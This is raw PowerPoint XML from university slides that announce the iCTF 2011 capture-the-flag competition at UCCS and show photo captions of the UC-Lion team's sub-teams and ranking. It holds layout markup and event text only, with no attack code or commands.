              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2011 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Competition </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>12/2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Friday  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9am-6pm@SENG A210</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>International </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Capture The Flag Cyberwar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Competition</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U-C-Lion Team Wiki Site: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>://athena.uccs.edu/ictf/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Learn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neat Tricks/Analysis for Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacks/Defenses</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    How to set up secure server site for projects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Contact Info: Prof. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Yue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, cyue@uccs.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3307508" y="2961541"/>
            <a:ext cx="2590800" cy="1661993"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All UCCS students </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All levels are welcome</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF6600"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="1828800"/>
            <a:ext cx="2400301" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350123317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smtClean="0"/>
              <a:t>Dr. Armstrong 2/19</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>UCCS/CS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3EBFBE9A-B4F8-4541-A766-310DCC6E9D2A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1146884" name="Picture 4" descr="400px-AdminEthereal"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="193675" y="573088"/>
            <a:ext cx="2038350" cy="1528762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1146885" name="Picture 5" descr="400px-Captains"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2898775" y="566738"/>
            <a:ext cx="1890713" cy="1417637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1146886" name="Picture 6" descr="400px-En138"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7473950" y="1563688"/>
            <a:ext cx="1541463" cy="2054225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1146888" name="Picture 8" descr="400px-IDS_IPS"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5295900" y="576263"/>
            <a:ext cx="1828800" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1146889" name="Picture 9" descr="400px-PasswdServiceAttack"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="163513" y="2462213"/>
            <a:ext cx="1901825" cy="1427162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1146890" name="Picture 10" descr="400px-Screen"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="144463" y="4384675"/>
            <a:ext cx="1858962" cy="1393825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1146891" name="Picture 11" descr="400px-Service"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6851650" y="4351338"/>
            <a:ext cx="2235200" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146892" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-142875" y="161925"/>
            <a:ext cx="8382000" cy="350838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>12/4/2009 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>UC-Lion team ranked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>8/16 US </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>in iCTF competition 9am-6pm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146894" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2479675" y="6040438"/>
            <a:ext cx="4521200" cy="247650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Team member designed CU-Lion Team T-Shirt Logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146895" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6726238" y="6065838"/>
            <a:ext cx="2122487" cy="403225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Service/Vulnerability Analysis Team</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146896" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7405688" y="3675063"/>
            <a:ext cx="1738312" cy="558800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>War Room EN138</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>College/Students </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>provide Refreshment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146897" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5314950" y="1905000"/>
            <a:ext cx="2122488" cy="247650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>IDS/IPS Team</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146898" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2754313" y="1935163"/>
            <a:ext cx="2122487" cy="247650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Captains Mike/Justin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146899" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="173038" y="2066925"/>
            <a:ext cx="2254250" cy="247650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Admin/Ethereal/Firewall Team</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146900" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="3895725"/>
            <a:ext cx="2122488" cy="403225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Password/Service Attack Team</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146901" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5797550"/>
            <a:ext cx="2436813" cy="403225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>HiTech Startrek Dual Projection Screen; Shield is up!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20483" name="Picture 3"/>
          <p:cNvPicPr>
